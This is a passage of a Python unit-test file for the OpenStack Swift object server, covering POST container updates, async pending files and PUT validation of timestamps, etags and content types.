resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'application/octet-stream;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[1].internal,
'x-meta-timestamp': t[3].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with no metadata newer than existing metadata should return
# 409, container update not expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
t[3].internal)
self.assertEqual(0, len(calls_made))
# POST with newer content-type but older metadata returns success
# and container update is expected newer content-type should have
# existing swift_bytes appended
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[2].internal,
'Content-Type': 'text/plain',
'Content-Type-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/plain;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[2].internal,
'x-meta-timestamp': t[3].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with older content-type but newer metadata returns success
# and container update is expected
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[4].internal,
'Content-Type': 'older',
'Content-Type-Timestamp': t[1].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/plain;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[2].internal,
'x-meta-timestamp': t[4].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with same-time content-type and metadata returns 409
# and no container update is expected
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[4].internal,
'Content-Type': 'ignored',
'Content-Type-Timestamp': t[2].internal,
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(0, len(calls_made))
# POST with implicit newer content-type but older metadata
# returns success and container update is expected,
# update reports existing metadata timestamp
calls_made = []
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={
'X-Timestamp': t[3].internal,
'Content-Type': 'text/newer',
'X-Backend-Storage-Policy-Index': int(policy)
})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'text/newer;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-content-type-timestamp': t[3].internal,
'x-meta-timestamp': t[4].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
def test_POST_container_updates_with_replication_policy(self):
self._test_POST_container_updates(POLICIES[0])
def test_POST_container_updates_with_EC_policy(self):
self._test_POST_container_updates(
POLICIES[1], update_etag='override_etag')
def test_POST_container_updates_precedence(self):
# Verify correct etag and size being sent with container updates for a
# PUT and for a subsequent POST.
def do_test(body, headers, policy):
def mock_container_update(ctlr, op, account, container, obj, req,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
calls_made = []
ts_put = next(self.ts)
# make PUT with given headers and verify correct etag is sent in
# container update
headers.update({
'Content-Type':
'application/octet-stream;swift_bytes=123456789',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 2,
'X-Timestamp': ts_put.internal,
'Content-Length': len(body)})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers, body=body)
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type':
'application/octet-stream;swift_bytes=123456789',
'x-timestamp': ts_put.internal,
'x-etag': 'expected'})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# make a POST and verify container update has the same etag
calls_made = []
ts_post = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': ts_post.internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch(
'swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(1, len(calls_made))
expected_headers.update({
'x-content-type-timestamp': ts_put.internal,
'x-meta-timestamp': ts_post.internal})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# sanity check - EC headers are ok
headers = {
'X-Backend-Container-Update-Override-Etag': 'expected',
'X-Backend-Container-Update-Override-Size': '4',
'X-Object-Sysmeta-Ec-Etag': 'expected',
'X-Object-Sysmeta-Ec-Content-Length': '4'}
do_test('test ec frag longer than 4', headers, POLICIES[1])
# middleware overrides take precedence over EC/older overrides
headers = {
'X-Backend-Container-Update-Override-Etag': 'unexpected',
'X-Backend-Container-Update-Override-Size': '3',
'X-Object-Sysmeta-Ec-Etag': 'unexpected',
'X-Object-Sysmeta-Ec-Content-Length': '3',
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('test ec frag longer than 4', headers, POLICIES[1])
# overrides with replication policy
headers = {
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('longer than 4', headers, POLICIES[0])
# middleware overrides take precedence over EC/older overrides with
# replication policy
headers = {
'X-Backend-Container-Update-Override-Etag': 'unexpected',
'X-Backend-Container-Update-Override-Size': '3',
'X-Object-Sysmeta-Container-Update-Override-Etag': 'expected',
'X-Object-Sysmeta-Container-Update-Override-Size': '4'}
do_test('longer than 4', headers, POLICIES[0])
def _test_PUT_then_POST_async_pendings(self, policy, update_etag=None):
# Test that PUT and POST requests result in distinct async pending
# files when sync container update fails.
def fake_http_connect(*args):
raise Exception('test')
device_dir = os.path.join(self.testdir, 'sda1')
t_put = next(self.ts)
update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
put_headers = {
'X-Trans-Id': 'put_trans_id',
'X-Timestamp': t_put.internal,
'Content-Type': 'application/octet-stream;swift_bytes=123456789',
'Content-Length': '4',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice'}
if policy.policy_type == EC_POLICY:
put_headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'X-Backend-Container-Update-Override-Etag': update_etag,
'X-Object-Sysmeta-Ec-Etag': update_etag})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers, body='test')
with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
async_pending_file_put = os.path.join(
device_dir, diskfile.get_async_dir(policy), 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_put.internal)
self.assertTrue(os.path.isfile(async_pending_file_put),
'Expected %s to be a file but it is not.'
% async_pending_file_put)
expected_put_headers = {
'Referer': 'PUT http://localhost/sda1/p/a/c/o',
'X-Trans-Id': 'put_trans_id',
'X-Timestamp': t_put.internal,
'X-Content-Type': 'application/octet-stream;swift_bytes=123456789',
'X-Size': '4',
'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': '%d' % int(policy)}
if policy.policy_type == EC_POLICY:
expected_put_headers['X-Etag'] = update_etag
self.assertDictEqual(
pickle.load(open(async_pending_file_put)),
{'headers': expected_put_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# POST with newer metadata returns success and container update
# is expected
t_post = next(self.ts)
post_headers = {
'X-Trans-Id': 'post_trans_id',
'X-Timestamp': t_post.internal,
'Content-Type': 'application/other',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=post_headers)
with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.maxDiff = None
# check async pending file for PUT is still intact
self.assertDictEqual(
pickle.load(open(async_pending_file_put)),
{'headers': expected_put_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# check distinct async pending file for POST
async_pending_file_post = os.path.join(
device_dir, diskfile.get_async_dir(policy), 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_post.internal)
self.assertTrue(os.path.isfile(async_pending_file_post),
'Expected %s to be a file but it is not.'
% async_pending_file_post)
expected_post_headers = {
'Referer': 'POST http://localhost/sda1/p/a/c/o',
'X-Trans-Id': 'post_trans_id',
'X-Timestamp': t_put.internal,
'X-Content-Type': 'application/other;swift_bytes=123456789',
'X-Size': '4',
'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': '%d' % int(policy),
'X-Meta-Timestamp': t_post.internal,
'X-Content-Type-Timestamp': t_post.internal,
}
if policy.policy_type == EC_POLICY:
expected_post_headers['X-Etag'] = update_etag
self.assertDictEqual(
pickle.load(open(async_pending_file_post)),
{'headers': expected_post_headers,
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
# verify that only the POST (most recent) async update gets sent by the
# object updater, and that both update files are deleted
with mock.patch(
'swift.obj.updater.ObjectUpdater.object_update') as mock_update, \
mock.patch('swift.obj.updater.dump_recon_cache'):
object_updater = updater.ObjectUpdater(
{'devices': self.testdir,
'mount_check': 'false'}, logger=debug_logger())
node = {'id': 1}
mock_ring = mock.MagicMock()
mock_ring.get_nodes.return_value = (99, [node])
object_updater.container_ring = mock_ring
mock_update.return_value = ((True, 1))
object_updater.run_once()
self.assertEqual(1, mock_update.call_count)
self.assertEqual((node, 99, 'PUT', '/a/c/o'),
mock_update.call_args_list[0][0][0:4])
actual_headers = mock_update.call_args_list[0][0][4]
# User-Agent is updated.
expected_post_headers['User-Agent'] = 'object-updater %s' % os.getpid()
self.assertDictEqual(expected_post_headers, actual_headers)
self.assertFalse(
os.listdir(os.path.join(
device_dir, diskfile.get_async_dir(policy))))
def test_PUT_then_POST_async_pendings_with_repl_policy(self):
self._test_PUT_then_POST_async_pendings(POLICIES[0])
def test_PUT_then_POST_async_pendings_with_EC_policy(self):
self._test_PUT_then_POST_async_pendings(
POLICIES[1], update_etag='override_etag')
def test_POST_quarantine_zbyte(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
objfile.open()
file_name = os.path.basename(objfile._data_file)
with open(objfile._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(objfile._data_file)
with open(objfile._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(objfile._datadir)[0], file_name)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(objfile._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_PUT_invalid_path(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT',
'CONTENT_LENGTH': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': '\xff\xff'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('Content-Type' in resp.body)
def test_PUT_no_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
del req.headers['Content-Length']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 411)
def test_PUT_zero_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = ''
self.assertEqual(req.headers['Content-Length'], '0')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_bad_transfer_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
req.headers['Transfer-Encoding'] = 'bad'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_if_none_match_star(self):
# First PUT should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# File should already exist so it should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': next(self.ts).normal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match(self):
# PUT with if-none-match set and nothing there should succeed
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': 'notthere'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT with if-none-match of the object etag should fail
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '0b4c12d7e0a73840c1c4f148fda3b037'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_PUT_if_none_match_but_expired(self):
inital_put = next(self.ts)
put_before_expire = next(self.ts)
delete_at_timestamp = int(next(self.ts))
time_after_expire = next(self.ts)
put_after_expire = next(self.ts)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': inital_put.normal,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT again before object has expired should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_before_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(put_before_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# PUT again after object has expired should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_after_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(time_after_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_common(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'x-object-meta-test': 'one',
'Custom-Header': '*',
'X-Backend-Replication-Headers':
'Content-Type Content-Length'})
req.body = 'VERIFY'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
self.object_controller.allowed_headers = ['Custom-Header']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]),
'p', hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '6',
'ETag': '0b4c12d7e0a73840c1c4f148fda3b037',
'Content-Type': 'application/octet-stream',
'name': '/a/c/o',
'X-Object-Meta-Test': 'one',
'Custom-Header': '*'})
def test_PUT_overwrite(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_overwrite_to_older_ts_success(self):
old_timestamp = next(self.ts)
new_timestamp = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': old_timestamp.normal,
'Content-Length': '0',
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': new_timestamp.normal,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
new_timestamp.internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(
diskfile.read_metadata(objfile),
{'X-Timestamp': new_timestamp.internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_overwrite_to_newer_ts_failed(self):
old_timestamp = next(self.ts)
new_timestamp = next(self.ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': new_timestamp.normal,
'Content-Length': '0',
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': old_timestamp.normal,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
with mock.patch(
'swift.obj.diskfile.BaseDiskFile.create') as mock_create:
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(mock_create.call_count, 0)
# data file doesn't exist there (This is sanity because
# if .data written unexpectedly, it will be removed
# by cleanup_ondisk_files)
datafile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
old_timestamp.internal + '.data')
self.assertFalse(os.path.exists(datafile))
# ts file sitll exists
tsfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
new_timestamp.internal + '.ts')
self.assertTrue(os.path.isfile(tsfile))
def test_PUT_overwrite_w_delete_at(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': 9999999999,
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY TWO')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '10',
'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'Content-Encoding': 'gzip'})
def test_PUT_old_timestamp(self):
ts = time()
orig_timestamp = utils.Timestamp(ts).internal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': orig_timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(ts),
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY TWO'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(ts - 1),
'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'})
req.body = 'VERIFY THREE'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_PUT_new_object_really_old_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '-1', # 1969-12-31 23:59:59
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', # 1970-01-01 00:00:01
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_object_really_new_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '9999999999', # 2286-11-20 17:46:40
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# roll over to 11 digits before the decimal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '10000000000',
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_invalid_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain',
'ETag': 'invalid'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_user_metadata(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY THREE'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY THREE')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '12',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'Content-Type': 'text/plain',
'name': '/a/c/o',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
def test_PUT_etag_in_footer(self):
timestamp = normalize_timestamp(time())
